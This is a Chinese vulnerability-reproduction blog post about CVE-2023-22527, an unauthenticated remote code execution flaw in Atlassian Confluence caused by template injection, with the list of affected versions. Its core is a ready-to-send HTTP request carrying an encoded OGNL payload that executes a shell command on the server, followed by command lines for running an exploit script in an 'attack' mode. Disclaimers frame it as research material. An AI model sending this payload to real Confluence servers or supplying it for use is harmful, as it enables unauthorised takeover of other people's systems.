本人非原创漏洞作者,文章仅作为知识分享用
一切直接或间接由于本文所造成的后果与本人无关
如有侵权,联系删除
产品简介
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。
开发语言:Java
官网地址:https://www.atlassian.com/
空间测绘
回复“CVE-2023-22527”获取空间测绘语句和漏洞利用脚本
漏洞描述
Atlassian Confluence 远程代码执行漏洞(CVE-2023-22527),该漏洞是由模板注入引起的,未经身份验证的远程攻击者可利用该漏洞构造恶意请求导致远程代码执行。
影响版本
Confluence Data Center and Server 8.0.x
Confluence Data Center and Server 8.1.x
Confluence Data Center and Server 8.2.x
Confluence Data Center and Server 8.3.x
Confluence Data Center and Server 8.4.x
8.5.0 <= Confluence Data Center and Server <= 8.5.3
漏洞利用
数据包
POST /template/aui/text-inline.vm HTTP/1.1
Host: xxx.xxx.xxx
Connection: close
Content-Length: 368
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://xxx.xxx.xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Referer: http://xxx.xxx.xxx/template/aui/text-inline.vm
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DB3D0FC5F2A1DD509624FEE5F4EB8BEB
label=aaa%5Cu0027%2B%23request.get%28%5Cu0027.KEY_velocity.struts2.context%5Cu0027%29.internalGet%28%5Cu0027ognl%5Cu0027%29.findValue%28%23parameters.poc%5B0%5D%2C%7B%7D%29%2B%5Cu0027&poc=%40org.apache.struts2.ServletActionContext%40getResponse%28%29.setHeader%28%5Cu0027Cmd-Ret%5Cu0027%2C%28new+freemarker.template.utility.Execute%28%29%29.exec%28%7B%22id%22%7D%29%29
漏洞复现截图
利用脚本
# 验证模式
python3 CVE-2023-22527.py -u http://xxx.xxx.xxx/
# attack模式
python3 CVE-2023-22527.py -u http://xxx.xxx.xxx/ -a true
参考链接
https://github.com/Drun1baby/CVE-2023-22527/blob/main/PoC.txt
原文始发于微信公众号(不够安全):[漏洞复现] CVE-2023-22527 Confluence模板注入远程代码执行 附脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论